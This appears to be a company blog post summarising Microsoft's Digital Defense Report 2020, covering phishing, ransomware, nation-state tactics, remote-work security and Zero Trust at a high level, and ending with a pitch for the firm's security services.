Security has become a major focus in 2021 due to many organisations adopting a hybrid work environment. Recently the Microsoft Digital Defense report came out and we got our resident security guru Danny to write an overview of it to make your life easy. Below are his thoughts and a video to explain more.
Did you know that Microsoft have been producing Security Intelligence reports since 2005? Unfortunately the latest report used the word unprecedented in the first sentence…… but that’s OK because it is true.
I just don’t like to be reminded of a lot about 2020.
Mark Anderson “National Security Officer” from Microsoft did a great summarization of the report in about 40 minutes. I’d recommend watching if you have the time.
It’s still staggering to know how much data Microsoft analyzes on what I think they are still calling their ‘Intelligent Security Graph’…… But when you think about a company of that size, even if only for their internal systems, there is a huge amount of data to be analyzed. The figure of 8 Trillion signals a day is often used which equates to approximately 93 million per second.
There is a great graphic that illustrates some of what makes up that number…..
The report covers ‘the state of cybercrime’, ‘nation state threats’ and ‘security and the remote workforce’
What’s also great about the report is that there are best practices and actionable learnings provided rather than just an informative piece leaving you wondering – “what do I do?”
Not surprisingly, phishing is way up there with three main forms; Credential Phishing, Business email compromise and a combination of the previous two. This is consistent with a move from malware attacks to phishing attacks as a greater ROI for attackers.
Out of these, Microsoft have also published some of the top five spoofed brands and BEC-targeted industries. They’ve also supplied a “prevention checklist” to provide some useful direction.
Malware and specifically ransomware were called out in the port outlining some frightening statistics and more importantly identifying the types of things to be done to minimize risk to avoid those attacks that are most commonly used to gain access and spread ransomware.
IoT devices also received a good summary of findings, key insights and a more thorough recommendation list. This seems to highlight that this is an often missed area of security and Microsoft are highlighting this in the report which is good to see. Supply chain security and third-party and open-source software also warranted some information and recommendations.
All of that and more just in the first ‘state of cybercrime’ section!
Moving into Nation State Attacks, Microsoft outline samples of nation state actors and their activities, Microsoft’s approach and lists of targets. The common operational aims were also identified primarily being espionage, disruption or destruction.
Not surprisingly an increase in password spray attacks is used in reconnaissance, not only for corporate accounts but for personal accounts where people might not have complex passwords or MFA enabled, making them high-value targets for surveillance. Credential harvesting through spear-phishing email, imitation domains and spoofed login pages also was highlighted as a method with some examples of how these were used in conjunction with email forwarding to continue reconnaissance even after password changes.
Malware was also mentioned as one of the most effective and commonly used methods to infiltrate and maintain persistence. Some examples of these were shortcut links with hidden payloads, Windows compiled html help files and PowerPoint and Word macros.
And finally given the year we’ve just had, VPN exploits were also targetted given the increase in the use of these.
The third section of the report focused on “Security and the Remote Work Force.” This highlighted the differences in which a lot of people were forced to work and highlighted a change from the moat/castle analogy we’ve used in the past to protect the borders of our networks.
A good explanation of the Zero Trust security model is given and well worth a read to understand Microsoft’s approach and help think if you haven’t already, about the value this model provides.
Devices and patch management (for obvious and important reasons!) along with Attacks on Infrastructure (DDoS) were mentioned along with some of the tactics used such as diversion of security resources to address what looks like a high impact attack via DDoS while another ‘quieter’ attack takes place on backend systems.
Identity based attacks and information rights management were covered with a good summary of insider threat and insider risk management.
An interesting section on Enterprise resilience was also included that highlighted the human element of resiliency in such a year of significant change.
In the last section “Actionable Learnings” – we are provided with a list of steps to take. I’ll quote this because I think it’s written really well……
“…we recommend organizations take a proactive approach to shoring up their security and resiliency by using the following controls.
While all these learnings are valid and beneficial recommendations for a cybersecurity program, we’ve selected our most salient points for each chapter and mapped them with icons as shown below.”
The first of these not surprisingly being ‘Adopt MFA’!
My advice is start with the summary from Mark Anderson and then download the report and focus on the areas that are of deeper interest and relevance…… Microsoft Digital Defense Report 2020: Cyber Threat Sophistication on the Rise – Microsoft Security
If your organisation needs a security upgrade reach out below to speak to our experts.